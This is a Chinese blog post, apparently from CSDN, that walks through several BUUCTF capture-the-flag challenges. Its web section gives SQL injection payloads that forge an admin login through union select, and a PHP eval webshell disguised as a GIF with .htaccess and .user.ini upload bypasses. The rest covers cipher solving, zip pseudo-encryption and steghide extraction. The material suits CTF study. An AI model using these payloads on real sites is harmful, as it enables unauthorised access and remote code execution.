BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

最新推荐文章于 2024-01-08 17:23:00 发布
最新推荐文章于 2024-01-08 17:23:00 发布
阅读量696 收藏
点赞数
分类专栏: SQL注入 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130113932
版权

第七周第三次

目录

WEB

[GXYCTF2019]BabySQli

[GXYCTF2019]BabyUpload

Crypto

世上无难事

old-fashion

​Misc

面具下的flag

九连环

WEB

[GXYCTF2019]BabySQli

这是一道很新的题目

我们打开环境 发现登入注册界面 先看看源码有没有提示

发现有一个

php文件 进入看看

发现加密 先base32 再64

select * from user where username = '$name'

 发现就是很简单的字符型注入

开始尝试万能密码

1' or 1=1#
select * from user where username = '1'or 1=1#'

 发现有过滤

bp fuzz看看

发现过滤了万能密码 () or for 这些

这里需要明白联合查询的特性

如果你输入了 union select 1,2,3#
会在数据库临时 打印一张虚拟的表

BUUCTF | [GXYCTF2019]BabySQli_山川绿水的博客-CSDN博客

该文章的图片

 所以我们需要把我们的登入账号密码 作为临时密码来登入

我们先猜字节

admin' order by 4#

 

过滤了 我们随便试试看 是  order 还是 by

admin' Order by 4#

 3个字节

我们开始 创建虚拟的表

账号 0' union select 1,'admin','123'#
密码 123

 发现出错 这里就没有提示 我们应该判断是MD5加密密码 因为MD5加密不可逆

这里是没有提示的 只能猜

要加密小写的(试出来的)

账号 0' union select 1,'admin','202cb962ac59075b964b07152d234b70'#
密码 123

 

 

[GXYCTF2019]BabyUpload

这道题还比较简单 用我们以前积累的东西就可以上传成功

编写payload

1.jpg

GIF89a
<script language='php'>eval($_POST['a']);</script>

这里加了文件头  和 js辅助 来防止文件头检查 和php文件检查

现在有两个 一个是上传.user.ini 另一个是.htaccess

一个一个试过去吧

.htaccess

SetHandler application/x-httpd-php

这里没加文件头其实也无所谓 没有进行检查

.user.ini

GIF89a                  
auto_prepend_file=1.jpg 
auto_append_file=1.jpg

我们开始上传

先上传1.jpg

再上传 .user.ini

我们抓包

 更改类型为

image/jpeg

上传成功 看看能不能链接

 很显然不可以

所以我们看看上传另一个

一样的步骤

 我们看看能不能直接链接

 

Crypto

世上无难事

 

 

quipqiup - cryptoquip and cryptogram solver 

单词太多了 进去网站分析

把他变为 小写

flag{640e11012805f211b0ab24ff02a1ed09}

old-fashion

和上面一样的

Misc

面具下的flag

下载文件 放入010查看

发现有 pk

 然后我们开始 改后缀

 发现加密 看看是不是伪加密 放入010

50 4B 03 04

发现是 08 没有加密 

50 4B 01 02

 发现后面是09 说明就是伪加密

我们改为偶数

使用kali的7z

7z x flag.vmdk

 发现加密

ook

只有一半 看看其他的

Brainfuck

 

 

flag{N7F5_AD5_i5_funny!}

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

九连环

下载完 得到文件

图片 放入010看看有没有藏文件

改后缀

 发现加密 看看有没有伪加密

 

 图片解压出来了 我们看看有没有隐藏东西放入010 没有 看看有没有隐写

放入kali

steghide info filename

 

 发现隐写了

分离

steghide extract -sf filename

 

得到密码 解压

 

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql视频7》操作 虚拟 创建过程 事务管理 字段约束
Han_python的博客
03-14 116
操作 创建 CREATE TABLE 名 ( 字段名 数据类型 属性 , 字段名 数据类型 属性 ); 名和字段名不能重复 默认允许空值,并且可以通过DEFAULT设置默认值,默认值必须是常数 例如: CREATE TABLE pet2 ( name VARCHAR(225) NOT NULL, owner VARCHAR(225) DEFAULT 'police', species VARCHAR(225), sex CHAR(1), birth DATE, death DATE ); 设
mysql虚拟创建_mysql虚拟
weixin_30845365的博客
01-27 6453
虚拟,就是实际上并不存在(物理上不存在),但是逻辑上存在的。在MySQL中,存在的虚拟:临时、内存和视图,派生。只能从select语句可以返回虚拟的是视图和派生。一、派生当select语句的from子句中使用独立子查询时,就称其为派生。selectcolumn_listfrom(selectcolumn_listfromtable_1) derived_table_namewh...
mysql新建虚拟
学习日记
12-07 932
建立虚拟 将查询出的数据插入临时
sql中将查询到的结果生成一个虚拟,再进行操作
热门推荐
qq_35958094的博客
04-04 2万+
举例:select count(distinct A.questno) from (select questno,fastdfsurl,docfastdfsurl,pngfastdfsurl from table1 where fastdfsurl like 'group%' and docfastdfsurl like 'group%' and pngfastdfsurl like 'gr...
sql临时创建虚拟、select临时、多行数据、自定义数据、插入数据
最新发布
Caiqiudan的博客
01-08 1032
【代码】sql临时创建虚拟、select临时、多行数据、自定义数据、插入数据。
自动办公- 用Python分析文本数据的词频
01-27
python文本分析
NLP实验,实现了词频统计,句子生成和n-gram模型进行分词
06-19
NLP实验,实现了词频统计,句子生成和n-gram模型进行分词
wordcloud-generator:从词频词典生成词云的工具
03-06
该工具使用词频词典中生成词云。 版本:1.0.0 要求 python版本:3.6+ 用法 python wordcloud_generator/__init__.py -h显示帮助消息。 用法: python wordcloud_generator/__init__.py <words> <wordcloud> --...
Python-BounterPython高性能大规模数据集词频计数
08-10
5. 查询结果:可以使用`counter[key]`获取特定词汇的频率,或者使用`counter.most_common()`获取最常见的词汇及其频率。 6. 存储和加载:Bounter支持序列化,可以使用`counter.save('counter.pkl')`保存计数器,...
汉语语料库分词类词频-高频词汇.xls
07-20
分类词频是文本分析中非常重要的内容。本资源把常用的分类词收集起来,方便大家在做文本分析时使用。有了本资源,大家可以提高文本分析的效率
.NET-创建虚拟,将 SQL 中的数据导入虚拟
weixin_34236869的博客
02-26 162
ylbtech-.NetFramework:.NET-创建虚拟,将 SQL 中的数据导入虚拟 虚拟概念和介绍 1.A,Console-创建虚拟 1.B,Console-将 SQL 中的数据导入虚拟 技术与环境 操作系统: windows 语言类别: C# thankyou: sun...
SqlServer创建
搞数据
07-01 2445
1.定义基本语句     语法:     USE 数据库名 CREATE TABLE 名 (列名 类型(大小) DEFAULT'默认值',                                                          列名 类型(大小) DEFAULT'默认值',                                    
[CTF] union select 联合查询,linux命令执行
V1040375575的博客
12-26 730
文章目录前言一、题目二、解题步骤1.使用bp抓包分析2.成功登陆后台 前言 CTF 学习记录:union select 联合查询,linux命令执行漏洞 一、题目 提  示: hint:union,命令执行 描  述: 命令执行 打开题目页面是一个login登陆 二、解题步骤 1.使用bp抓包分析 抓取登陆发送包: POST /login.php HTTP/1.1 Host: 1.1.1.1:10766 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
一天一道ctf 第18天(联合查询构建虚拟数据)
scrawman的博客
03-31 276
[GXYCTF2019]BabySQli 试了一下发现过滤了and,or,order,(),但可以大写绕过 试了一下Order by 3#可以,但是union select 1,2,3#也没有回显,到这里就卡住了 原来search.php的源码里有提示 base32编码由大小写字母和数字组成,base64只由大写字母和数字组成,所以这是base32。解密后得到一串base64加密过的字符串,再解密后得到 select * from user where username = '$name' 这里用的知识
BUUCTF_MISC-九连环
wwxxss
11-05 1031
注意加密的地方,不然解压不出来文件
BUUCTF misc 专题(32)九连环
tt_npc的博客
11-27 684
下载解压后是这样的一张图片 接下来将它放入到kali中进行binwalk,分离出来三个文件,打开zip文件
BUUCTF misc 解题记录 一(超级详细)
qq_51090016的博客
03-16 1万+
持续更新一些不会的题目,有错误的还请大佬指点N种方法解决 N种方法解决 附件下载是一个exe文件,我还运行不了。。这咋办 改成txt文件看看 好像有什么东西藏在里面 前面有个jpg 还有base,用winhex打开看看 到这没思路了,看wp base64可以示图片 这个让我这个菜鸡人傻了 转换网站点这 转换完还能帮你另存为,真不错 扫一下就OK了 ...
sql虚拟的操作
zhangsan9527的博客
05-23 4352
关于虚拟的操作的 //从虚拟中查询对应的id进行更新 UPDATE jdy_order set order_pointsid=1 where id in *(* //从虚拟中查询id SELECT result.id from**(** 结果--SELECT o.id FROM `jdy_order` o,jdy_merchant m 结果--where o.cashier=1 结果--and o.store_id=m.id 结果--and m.merchant_group_id
如何使用Tf-idf进行词频统计
06-10
使用Tf-idf进行词频统计的过程如下: 1. 分词:将文本进行分词,将每个词作为一个单独的项。 2. 构建词频矩阵:将分词后的结果构建成一个词频矩阵,其中每行代一篇文档,每列代一个词项,矩阵中的每个元素示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值